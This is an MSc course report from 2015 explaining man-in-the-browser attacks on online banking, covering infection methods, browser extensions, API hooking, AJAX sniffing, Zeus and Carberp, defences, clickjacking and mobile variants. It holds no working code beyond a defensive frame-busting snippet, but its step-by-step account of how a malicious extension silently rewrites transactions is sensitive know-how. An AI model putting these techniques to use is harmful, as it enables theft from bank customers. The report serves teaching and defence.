man in the browser attacks

Man-in-the-browser attacks

Christofilos Konstantinos (MM4140023) Gerardos Pavlos (MM4140001)

Pantazaras Sokratis (MM4140013)

March 13th, 2015

Mar

MSc in Information Systems Part Time, 2014-2016

Course: Critical Information and Communication Infrastructure Protection

1 Man-in-the-browser attacks - Christofilos, Gerardos, Pantazaras

Contents 1. Introduction.......................................................................................................................................... 2

2. From M to B .......................................................................................................................................... 3

3. Malware distribution overview ........................................................................................................ 4

4. The Man-in-the-browser (MITB) attack .......................................................................................... 6

4.1 Points of attack ................................................................................................................................ 6

4.2 MITB attack step-by-step ............................................................................................................... 9

4.3 Famous MITB malware ................................................................................................................ 10

4.4 What makes MITB attack difficult to defend from ................................................................ 10

4.5 Defending against MITB attacks ............................................................................................... 11

5. Variants of MITB ................................................................................................................................ 14

5.1 Clickjacking ..................................................................................................................................... 14

5.2 Boy-in-the-browser (BITB) ........................................................................................................... 16

5.3 Man-in-the-Mobile (MITMO) ....................................................................................................... 16

6 Conclusions ........................................................................................................................................ 18

7 References .......................................................................................................................................... 19


1. Introduction Internet has transformed the global economy and revolutionized the way that people interact, communicate and exchange information and goods.

Users are able to easily and quickly use any kind of personal device (smartphones, tablets, laptops) in order to access online services, which also provide two-way communication; not only do they update their users but they also get updated from them (Web 2.0).

One of the most commonly used services globally is Internet banking (e-banking).

As of April 2012, around 423 million people worldwide accessed online banking sites, reaching 28.7 percent of total Internet users1. Only for North America and Europe, this percentage was 45% and 37.8% respectively.

Graph source: statista.com

The statistics presented above allow us to understand the importance and usability of e-banking to Internet users.

They also allow us to understand why cybercriminals are interested in exploiting these services. As more and more people are accessing online banking services, they become potential targets to those who have the technical expertise and audacity to swindle them and gain personal financial benefit.

1 http://www.statista.com/statistics/233284/development-of-global-online-banking-penetration/


2. From M to B One of the most well-known types of attack against financial institutions is the Man-in-the-Middle (MITM) attack.

This method is based on the attackers ability to intercept a legitimate users session with a bank's web server and use their machine (i.e. the attackers) as a proxy. All data would then pass through their computer, giving them complete control over it and allowing tampering without either ends knowledge.

This method has been used for quite some time from cybercriminals. However, I.T. security engineers have managed to increase their defensive measures by the use of device identification and Risk Engines (REs).

Risk engines analyse information related to every user session, like unique device IDs (UDIDs), login times and session duration. All data are then combined and analysed in order to evaluate whether such activity is reasonable/typical for that specific user (behavioural profile). If the analysis produces an alert, then the issue is escalated for further inspection.

The above factors - technology (risk engines), experience (previous incidents) and maturity of Internet users (it is easier for todays average user to identify a fraudulent website than it was some years ago), have contributed in making MITM attacks very difficult to execute successfully.

For this reason, cybercriminals started to move towards a more advanced and promising method.

Instead of hijacking user sessions at the network layer (during transmission of data), attackers have begun to target directly the users application layer, their web browser.


Trojan horses which are distributed through various well-known methods (email attachments, hyperlinks on social networks or hijacked websites) install extensions on web browsers. These extensions are able to:

- Modify what the user sees on their computer (DOM manipulation), - Modify and/or redirect original user data before encryption and transmission takes place.

This ensures the data sent to the web banking server seems legitimate and therefore fraud cannot be detected.

- Modify the returning transaction data upon server response, so as to present information to the user exactly as it expected to look.

3. Malware distribution overview Internet provides a wealth of information and services to every user around the world. Of course, some of the available services relate to non-legitimate purposes. Underground communities have created well-organized, online markets where users can obtain malicious software for their needs (malware-as-a-Service - MaaS).

Before proceeding with the details of how a MITB attack takes place, we will describe how malware in general is distributed to computers of unsuspected users all around the world.

Malware distribution involves three parts:

Malware distribution - parties involved

a) Infection Point The infection point is the method by which the malware is distributed to the target machines. There are several distribution methods like:


A hijacked website which automatically downloads and installs a trojan on the users computer (drive-by download).

An email attachment which contains executable code and runs when the user opens it. A USB key which contains the malware and runs when the users connects it to their

computer (autorun.inf). A PDF document or a PowerPoint presentation with embedded script code.

b) Command and Control (C&C) Server

Once the malware has been installed on the computer, instructions must be provided from the attacker about the exact actions that will be performed. These instructions are provided through configuration file and are distributed on the target machines from a Command & Control (C&C) server. they contain information such as:

Website URLs that need to be monitored and intercepted, Custom form fields that need to be added/changed per URL, Drop server locations, where all the intercepted data will be sent.

The configuration files are usually encrypted/obfuscated, so as to be difficult to examine their content, and can be easily updated from the C&C server with new information, e.g. new e-banking URLs, updated form fields and drop servers.

c) Drop Server The drop server is the location where all collected data from the target computers are sent. This could be a hijacked machine whose administrator/owner has no knowledge that is being used by cybercriminals, or the same C&C server that is used by the attackers.


4. The Man-in-the-browser (MITB) attack A web browser is the client-side application which communicates with remote web servers, downloads content and renders it on the users screen.

The main concept behind the MITB attack is that the rendering of information received from the web server (i.e. how the webpage will be displayed DOM tree) can be edited/manipulated on-the-fly, in order to customize/improve the users experience, e.g. remove ads/banners or change colours (augmented browsing).

Although there is nothing wrong with this concept, the exact same method can be used for malicious purposes; the mechanisms that can change the layout or the colors of a web page can also change the values of submitted forms in the background, while displaying whatever information their creator wants to in the users screen.

4.1 Points of attack Extra functionality can be inserted into web browsers in a variety of ways, depending on the browser type. Extra functionality usually aims at enhancing user experience, but fraudsters can use this capability to take control of the browser. Ways to incorporate new functions into the browser include:

Browser Helper Objects (BHOs) Browser helper objects are dynamically-loaded libraries (DLLs), specifically designed for Microsofts Internet Explorer with access to the Document Object Model (DOM). They are activated on browser start-up and provide additional functionality, e.g. the Adobe Acrobat plugin is a BHO which allows opening PDF files directly from the web browser.


List of Add-ons (BHOs) in Internet Explorer

BHOs have been extensively used by cybercriminals due to the fact that they are easily developed and run with high privileges (System account). Extensions Similar functionality to BHOs for other browsers like Chrome, Firefox or Opera is carried out from extensions. Some of them, like Greasemonkey for Firefox (www.greasespot.net) act as a placeholder for custom-made user scripts. That means that Greasemonkey does not perform a specific action - like Adobe Acrobat plugin for PDF files - but instead allows any user script to run with its custom functionality like a dynamic/reprogrammable extension.

List of extensions in Google Chrome


API hooking API hooking is a complex technique which allows modification of API calls between an application (.exe) and the DLLs it dynamically loads - whether application or system. For example, on Windows machines, the Windows Internet API (wininet.dll) enables applications to interact and access Internet resources through HTTP and FTP protocols. Malware installed on a browser can - once activated - hook to various functions of wininet.dll, e.g. InternetConnect(), HttpSendRequest(), HttpOpenRequest(), InternetReadFile() and modify the original calls.

API hooking on wininet.dll

AJAX sniffing Another technique used for MITB attacks is AJAX sniffing. The approach this time is to hit the web server in order to collect or alter data on the client side. Web technologies have evolved rapidly in the last years, and are now able to provide high quality services with very smooth and fast functionality. In order for users to enjoy the Web 2.0 services, a hack was invented in order to bypass the HTTP drawbacks, like the synchronous way of requests. A technology called Asynchronous JavaScript and XML (AJAX) is commonly used which makes the navigation and use of a web application look and feel more like a desktop application. AJAX is based on a JavaScript object called XMLHttpRequest, which is responsible for calling URLs asynchronously in the backstage of a web site visit and is able to update specific parts or the complete page, when a response is returned. AJAX sniffing is based on that implementation and injects JavaScript code snippets in web pages that are vulnerable to XSS attacks. XSS (Cross Site Scripting) attacks exploit web server vulnerabilities and allow the attacker to inject code to a webpage via HTTP payload (POST, GET parameters). When the malicious Javascript code is injected into the web server, it overrides the XMLHttpRequest object and starts sniffing all the requests the client makes to the server. That way, it can intercept all the information that is exchanged between the client and the


server and forward the data to a remote server (drop server) where they can be used for whatever purpose the cybercriminals may want. Just imagine, modern sites logs users via AJAX calls, which means that usernames and passwords from all users can be collected, without having to install any malware on the clients. That is the worst thing about AJAX sniffing. Fortunately, this kind of attack is based on server-side exploits; therefore the main responsibility shifts to the web servers administrator(s), who are theoretically more technically aware of the field of information system security than a normal user.

4.2 MITB attack step-by-step A detailed, step-by-step description of the MITB attack can be seen below:

1. The Trojan infects the computer's software, either at the operating system or application level (infection point).

2. The Trojan installs an extension into the browser configuration, so that it will be loaded next time the browser starts.

3. At some later time, the user restarts the browser. 4. The browser loads the extension. 5. The extension registers a handler for every page-load. 6. Whenever a page is loaded, the URL of the page is searched by the extension against a list

of known sites targeted for attack. 7. The user logs in securely on to for example https://secure.ebanking.site/. 8. When the handler detects a page-load for a specific pattern in its target list (for example

https://secure.original.site/account/do_transaction), it registers a button event handler. 9. When the submit button is pressed, the extension extracts all data from all form fields

through the DOM interface in the browser, and remembers the values. 10. The extension modifies the values through the DOM interface. 11. The extension tells the browser to continue to submit the form to the server. 12. The browser sends the form, including the modified values, to the server. 13. The server receives the modified values in the form as a normal request. The server cannot

differentiate between the original values and the modified values, or detect the changes. 14. The server performs the transaction and generates a receipt. 15. The browser receives the receipt for the modified transaction. 16. The extension detects the https://secure.ebanking.site/account/receipt URL, scans the

HTML for the receipt fields, and replaces the modified data in the receipt with the original data that it remembered in the HTML.

17. The browser displays the modified receipt with the original details. 18. The user thinks that the original transaction was received by the server intact and

authorized correctly.


4.3 Famous MITB malware A few of the most well-known malware which use the MITB attack method can be found below:

- Zeus/Zbot Zeus/Zbot and its variants (Zeus Gameover P2P) is probably the most well-known financial malware. It infects Windows machines and is based on the client/server model (requires a C&C server in order to organize the attack). It is able to steal private data from the infected computers such as usernames/passwords, banking credentials by injecting malicious information in the users web browser.

- Carberp In 2012, the Carberp malware was reported replacing Facebook pages with fake ones which stated that the users account was temporarily locked. In order to unlock the account, the user had to complete a web form which included personal information like name, email, password and also pay a 20 uKash e-voucher to confirm verification. The cash voucher would supposedly be added to the users Facebook main account balance but in reality, the 19-digit uKash code was transferred to the Carberp botmaster who could use it as normal cash equivalent.

Carberps Facebook attack

4.4 What makes MITB attack difficult to defend from Man-in-the-Browser attacks pose high risk due to the following factors:

Infection is easy Users are accustomed to downloading several files from the Internet, as well as regularly updating their installed applications, including their web browser and its various extensions. Software updates are usually either automatically approved without any user intervention, or are not given enough attention (users tend to just click Accept on installation prompts without noticing what the dialogs/prompts state).


Detection is hard All technical vectors involved in the MITB attack (extensions, scripts) are carefully crafted, involve advanced technical knowledge and most importantly, are installed and run only on the client-side, where normal users usually have neither the expertise nor the technical knowledge and/or mechanisms to defend themselves. Additionally, such malware is usually distributed with variations of the malicious code in order to circumvent antivirus/antispyware software installed on the client machines. Authentication and server-side fraud detection mechanisms are inadequate MITB is not a phishing attack; it does not use fake data, e.g. malicious websites that resemble the real ones, in order to steal users information. All data that the e-banking servers receive are indeed sent from legitimate users and their machines. This means that traditional security measures like authentication (username/password) or transaction verification (by use of one-time-passwords - OTP) are rendered useless since all of this data is sent through the browser and is therefore available to tamper with by the installed malware.

4.5 Defending against MITB attacks As already stated, MITB attacks are quite advanced both in concept and technology, which means that there is no easy way to defend against them. However, there are some techniques and/or proposals which can be used against them and are presented below:

Hardened browser The concept of a hardened browser is based on the creation of a browser that will be able to access e-banking services without allowing any kind of external/custom-made code which by default might be malicious (extensions/BHOs) - to load. Additionally, the application should be available for distribution as a single, static binary so as to also avoid API hooking through dynamically-called external libraries. In more detail, a hardened browser should fulfil the following requirements:

O Statically compiled prohibit loading of dynamic libraries O Stripped no compiler symbols should be available to guide the attack O Have additional binary-protection methods - executable should be encrypted or

packed. O Allow only HTTPS connections prohibit plain HTTP o Process monitoring for launching of executables from browser o Memory-space protection (against key loggers and/or screen capturing

applications) o White-list of valid e-banking websites o Browser can only connect to a predefined list of e-banking servers. o White-list of SSL certificates


o No addition of SSL certificates is allowed

Pros

+ No extensive work required in order to customize and strip-down industry standard browsers (Firefox, Chrome, IE). + Can be easily distributed as an alternative/parallel installation for use only on secure e-banking sites. + Better usability than a live distribution if an update is published, users just download the new version without need to burn new CD or re-format USB stick.

Cons

- Allowing only valid websites or SSL certificates based on white-lists might lead to having to continuously update the executable with new/updated information. This is obviously a not very practical and certainly quite tiring process for the end user, who would certainly prefer not to be involved. - Downloading the hardened browser is always susceptible to phishing the user may be deceived and redirected to a website where a malicious/vulnerable version of the supposedly hardened browser is distributed.

Bootable, write-protected live distributions (live-CD/DVD) Free/Open source software distributions of client operating systems like Knoppix are distributed freely and can be burned to a bootable, read-only media (CD/DVD). As the media is write-protected, no installation can take place permanently, which means that if the user wishes to perform an online bank transaction, a reboot will securely reset all browser settings to the defaults and will allow the user to connect to the e-banking server securely.

Pros

+ Upon reboot, a live-CD is considered highly secured.

Cons

- Browsers on live-CDs also need to be updated and patched every time the user restarts the live-CD distribution, otherwise they run the risk of connecting to the web banking server insecurely. - Users dont like to reboot their computers very often. Especially as they will have to lose all the customizations that they have made during their current session, it is quite probable that they will eventually either not reboot which poses a security issue - or not use the live-CD distribution at all.


Out-of-band transaction verification A popular method to counteract a MITB attack is the so called Out of Band (OOB) transaction verification. This method is based on the usage of a communication channel other than the web browser (telephone call, SMS) in which the transaction details will be verified.

Pros

+ Works with standard devices (mobile phones) does not need additional hardware

Cons

- Can be easily subverted as well if the verification information (phone number) is stored in the users account online. - OOB SMS can also be broken by Man-in-the-mobile (MITMo) attacks like ZitMo (Zeus-in-the-Mobile) and SpitMo (SpyEye-in-the-Mobile).

Campaigning Training for raising awareness Apart from the technical vectors, campaigns and training sessions from financial institutions and government agencies help in raising user awareness about how these attacks take place and how they could be identified. One of the more effective methods for stopping MITB is by educating Internet users on the extent of the threat. Malware has to enter the users computer somehow, so if users are made aware of how this can happen, it is less likely MITB will be effective. Properly maintained firewalls and scanning of all downloads will significantly reduce a users risk of being a victim.


5. Variants of MITB The MITB attack method is actually a family of malware components designed to exploit vulnerabilities in user browsers. Some members of the family can be classified as sub-categories in their own right. The most important of these are presented briefly below.

5.1 Clickjacking Clickjacking was originally described by Jeremiah Grossman of WhiteHat Security fame back in 2008. The idea here is to create a layer of authenticity, under which lies a different purpose. An easy-to-understand example is given in http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html. The gist of that example is described below.

Assume that a user is engaged in online banking activity. They are already logged into the bank service and most probably assume that they are perfectly safe as long as this is the case. Moreover, they expect that any content displayed while they are browsing through their account and transaction information is originating from the bank service.

At some point the user comes across a page which includes some sort of offering, the chance for example to win a free iPad. The user may then be tempted to give this a shot: if it comes from the bank, it must be safe. They proceed in clicking on some link, which then results in something quite different happening: perhaps an amount of money from one of their accounts is transferred to another account, which the user knows nothing about. It will probably be sometime before the user realises that somethings gone wrong.

How did this happen? The usual mechanism is quite simple. Assuming the existence of a website that an attacker is interested in (well refer to that as website A the banks website in the previous example), and a user that has access to that website (the user engaged in web-banking), the success of this method depends on whether the attacker can trick the user into visiting a different website (website B), which is under the formers control. If the users browser is running malicious BHOs or plug-ins as a result of it having been hijacked, this is quite easy.

The user is directed to website B, after pointing their browser at a location of interest (as is described in the MITB section). Website B is under control of the attacker, and so the latter can render, for instance, JavaScript and multiple pages. Website A is loaded inside a separate iframe, and is initially displayed as-is to the user. The user starts their interaction with website A as normal. They log in and take care of their business as usual. They are never aware that something is wrong. At any time, the attacker can place content of their choosing on website B and overlay that content over the content of A by using a variety of ways (such as rendering the content of website A invisible). The attacker can then take advantage of the fact that the user is still actually interacting with A, but seeing something completely different on screen. In other words, the attacker is tricking the user into performing legitimate bank transactions, while the user is under the impression they are doing something completely different (such as opting for a free iPad).

L. Huang et al. in their paper Clickjacking: Attacks and Defences classify current clickjacking attacks into 3 categories, which correspond to the ways that users are forced to issue input


commands (i.e. clicking on a link) which result in actions different than what they believe when they issue them (the phrase out of context is used throughout the paper to describe this situation). These categories are:

Attacks that compromise target display integrity, meaning that the user views something different than the legitimate website is actually showing, at the time when considering about clicking on a link.

Attacks that compromise pointer integrity, meaning that the feedback given from the cursor or other input device is reliable and has not been tampered with, so that the user may click on something different than they intended.

Attacks that compromise temporal integrity, meaning that the users are not given a sufficient amount of time to understand what they are clicking on and whether theyd really like to proceed.

An interesting distinction is made between clickjacking attacks, and social engineering attacks, which do not attempt to manipulate security mechanisms to breach a websites security, but rather to manipulate people to attempt something that they normally wouldnt do. A social engineering attack is more or less the psychological bullying of the user into giving out information that is of value to attackers (i.e. account numbers, e-mails, passwords), because the user is manipulated to doing so by social conventions. A simple example is a social network post which prompts the user to like it or interact with it by posing as an organisation for the aid of blind children. The user may just go ahead and do this to appear concerned and socially responsible to others. The problem here arises from people being naive enough to follow a social convention without verifying that the information they are dealing out is actually going to where they are expecting it to this has nothing to do with clickjacking.

The most widely used clickjacking defences today use frame-bursting. Frame-bursting refers to code provided by a webpage which prevents the page from being loaded in an iframe, as described above. The basic principle of the code is simple:

if (top.location != this.location) {

top.location = self.location;

}

Unfortunately, frame-bursting has the major drawback of being incompatible with third-party widgets, such as like and follow buttons. Other approaches include:

User confirmation: The user is prompted to verify his initial action. User interface randomisation: This approach dictates that the positioning of sensitive

elements (such as buttons, links, etc.) should vary every time a page is loaded. Opaque overlay: All cross-origin frames are rendered opaquely (a technique employed by

the Gazelle browser).


Evidently, these approaches suffer from their own problems. User confirmation is notorious for straining the patience of users, who feel it is burdensome to have to make multiple clicks to complete one action. Interface randomisation violates the basic principle of keeping an interface consistent so that users can grow accustomed and not get lost every time they try to interact with it. Finally, opaque overlay removes all transparency from all cross-origin elements, thus deforming many websites that are not being used for malicious purposes.

5.2 Boy-in-the-browser (BITB) The Boy-in-the-Browser method of attack is generally considered a less-mature, dubbed-down version of the MITB attack. There are some differences between the two approaches:

The BITB trojan redirects the traffic between the infected browser and the website of interest to a third-party site (which may even mimic the legitimate one), where most of the unauthorised processing takes place, either it consist of simply copying down the information passed or altering the ongoing transactions in some form.

BITB scripts are much simpler than MITB scripts, and therefore require fewer resources. Evolving a new BITB trojan can be a process that takes a few hours, while useful MITB trojans usually need months to mature.

BITB trojans evolve much more frequently, and therefore anti-virus programs have more difficulty catching up with the latest threats.

It is easier to locate the culprit once the attack has been recognised as a BITB attack, and shut down the third-party server collecting and processing the information.

Because of their nature, BITB trojans tend to be used for one-time hit-and-run operations. They are also used to target a greater variety of websites and are not primarily focused on financial institutions.

The basic outline of the method of operation is this: once the BITB trojan is downloaded, it starts tampering with the user systems host file, mainly by adding new entries to it. This results in a re-mapping of specific addresses to others, which point to websites controlled by the attacker (these websites may be phishing sites or act as proxies to legitimate sites). As in the MITB situation, the victim is completely unaware: the URLs displayed on the browser address bar are the legitimate ones.

5.3 Man-in-the-Mobile (MITMO) With the growth of the smartphone market, especially the Android platform, it was inevitable that cyber-attackers would eventually target mobile phones, as they now offer more opportunities than ever for information eavesdropping and related malicious activities. Indeed, with so many apps hitting the market at this pace, and which involve pretty much everything from gaming to banking to social networking, the premise is very promising for anyone who wants to gain access to sensitive data fast and easy.

It is no surprise that the MITB malware family expanded to hit the new market. Around the start of 2011, S21Security detected a new, rather sophisticated, banking trojan, which they named Tatanga, written in C++ and affecting banks in Spain, United Kingdom, Germany and Portugal


using MITB functions. Almost a year later, ESET was following the progress of the same virus family (which they in turn called Gataka), commenting on their blog how surprising it was that it had received so little attention at the time, taking into account that the trojans stability and functionality was bound to make it popular with fraudsters in the future. In due turn, Trusteer noted soon after that a variant of the malware had finally migrated onto the Android platform.

The attack is not launched at the users mobile at first, but rather at the users web browser on their desktop computer. The bait here is a new security feature that is supposed to have become available for the Android platform, which a great number of users already have installed. The user is prompted to download this app on their mobile by entering their number and submitting an online request, which will then result in a text message being sent to their phone. The SMS contains a link to install the alleged app, which is in fact the Tatanga virus.

Once installed, the virus can capture all SMS traffic, thus gaining access to all sorts of sensitive information (including bank authorisation codes), which it transmits to the attackers.

This method of attack is very useful in circumventing the out-of-band security mechanisms that a lot of European banks use as a verification method. The out-of-band security approach requires the use of a separate medium to act as a verification agent for online transactions launched from a personal computer. That medium is usually the users mobile phone, where an SMS verification code is sent, which the user can then enter at the appropriate time to verify that they are actually the party that initiated the transaction. By gaining access to the SMS communications the users phone participates in, the virus renders out-of-bank authentication ineffective.


6 Conclusions The MITB Trojan, along with all its variations, is yet another example of the undeniable fact that cyber-criminals have turned their attention to simple users, rather than companies and other organisations, the majority of which are now well aware of the risks of online transactions and tend to invest a lot in security measures and procedures.

Individual users, on the other hand, remain at best moderately informed about the risks of using online services of any kind. They are not too familiar (or do not wish to become so) with the many pitfalls of such endeavours as online banking. Nevertheless, they make more and more use of available services, thus increasing the chances for attackers to gain profit. As a result, more services become available at a growing pace, especially in the mobile phone market. End users favour mobile applications, as they offer instant access to whatever they need, whenever they need it. The Android app market especially is a goldmine for fraudsters who want to target unsuspecting users: downloading and installing a mobile app is as easy as can be, and it seems that the notion of risk in this area has yet to become common knowledge.

Clearly, this is something that has to be taken into account, and it is companies that have to take the first step: assuming that users are well-protected behind their firewalls and anti-virus platforms can bring down even the most sophisticated of security systems. Even approaches that use multiple media for authorisation (such as the out-of-band verification system) can be bypassed with the advent of mobile-targeted trojans. Raising awareness is of course imperative, but it is worrying that most users tend to believe that it is rather the companies responsibility to ensure secure exchange of information, and not their own.


7 References C. Cain, SANS Institute Analyzing Man-in-the-Browser (MITB) Attacks

(https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687)

O. Eisen, 41st Parameter Catching the fraudulent 'Man-in-the-Middle' and 'Man-in-the-Browser' (http://www.the41.com/sites/default/files/MITM%20and%20MITB%20Overview_41st%20Parameter.pdf)

J. Dossogne, O. Markowitch Online banking and man in the browser attacks: Survey of the Belgian situation (http://www.ulb.ac.be/di/scsi/markowitch/publications/wic2010b.pdf)

M. Stahlberg, F-Secure The Trojan money spinner (https://www.f-secure.com/weblog/archives/VB2007_TheTrojanMoneySpinner.pdf)

OWASP Man in the browser attack (https://www.owasp.org/index.php/Man-in-the-browser_attack)

Trusteer/IBM How Man-in-the-Browser (MitB) Malware Works video (http://securityintelligence.com/media/malware-man-in-the-browser-mitb-how-works-video)

ISACA Man in the Browser - A Threat to Online Banking (http://www.isacajournal-digital.org/isacajournal/2013vol4?folio=16#pg18)

Almeida, Buyuksahin, Dimogerontakis, Tarhan Man in the browser attacks A. Nordbo Man-in-the-browser to retrieve content of SSL connections

(https://andynor.net/static/fileupload/419/S2_SoftSecTrends_Man-in-the-browser.pdf)

Wells, Hutchinson, Pierce - Edith Cowan University Enhanced Security for Preventing Man-in-the-Middle Attacks in Authentication, Data Entry and Transaction Verification (http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1057&context=ism)

Sood, Enbody, Michigan State University The Art of Cyber Bank Robbery (http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf)

T. Siebert Advanced Techniques in Modern Banking Trojans (https://www.botconf.eu/wp-content/uploads/2013/12/02-BankingTrojans-ThomasSiebert.pdf)

R. Hansen, SecTheory Clickjacking (http://www.sectheory.com/clickjacking.htm)

T. Hunt Clickjack attack - the hidden threat right in front of you (http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html)

J. Grossman Clickjacking: Web pages can see and hear you (http://jeremiahgrossman.blogspot.com.au/2008/10/clickjacking-web-pages-can-see-and-hear.html)

L. Huang, A. Moshchuk, H. J. Wang, S. Shechter, C. Jackson Clickjacking: Attacks and Defences (https://www.google.gr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0CCoQFjAB&url=https%3A

%2F%2Fwww.usenix.org%2Fsystem%2Ffiles%2Fconference%2Fusenixsecurity12%2Fsec12-

final39.pdf&ei=X58CVa3SHMavygOJ-YLYDg&usg=AFQjCNH5frH5dZ0y3LeilOA4dSLda5Y4eQ) S. Johnson Social engineering attacks: Is security focused on the wrong problem?

(http://searchsecurity.techtarget.com/feature/Social-engineering-attacks-Is-security-focused-on-the-wrong-problem)

G. Rydstedt, E. Bursztein, D. Boneh, C. Jackson Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites (https://www.google.gr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CCAQFjAA&url=http%3A%

2F%2Fcrypto.stanford.edu%2F~dabo%2Fpubs%2Fpapers%2Fframebust.pdf&ei=VqECVfjICofOyQOr6YL4DA&usg=AFQjCNGJ

N_rfw1OALYJFvaoKJ0ncxARpIw&bvm=bv.88198703,d.bGQ)


PC Tools The Boy-in-the-Browser is more than Just Mischievous (http://www.pctools.com/security-news/bitb-trojan/)

Imperva Boy in the Browser http://www.imperva.com/DefenseCenter/ThreatAdvisories/Boy_in_the_Browser

B. Prince Boy-in-the-Browser Attacks Come Out and Play (http://www.eweek.com/security-watch/boy-in-the-browser-attacks-come-out-and-play.html)

InfoSecurity Magazine Man in the Browser (MITB) becomes Man in the Mobile (MITMO) (http://www.infosecurity-magazine.com/news/man-in-the-browser-mitb-becomes-man-in-the-mobile/)

A. Klein Tatanga Trojan Bypasses Mobile Security to Steal Money from Online Banking Users in Germany (http://securityintelligence.com/tatanga-trojan-bypasses-mobile-security-to-steal-money-from-online-banking-users-in-

germany/#.VQKojY6Ud8F) A. Klein Man-in-the-Mobile Attacks Single Out Android

(http://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/#.VQKpJY6Ud8G) J. Boutin Win32/Gataka: a banking Trojan ready to take off?

(http://www.eset.com/int/about/blog/blog/article/win32gataka-a-banking-trojan-ready-to-take-off/)

man in the browser attacks

Documents

mitb attacks

browser mitb attack

browser attacks christofilos

mitb attack difficult

variants of mitb

browser bitb

famous mitb malware

internet banking ebanking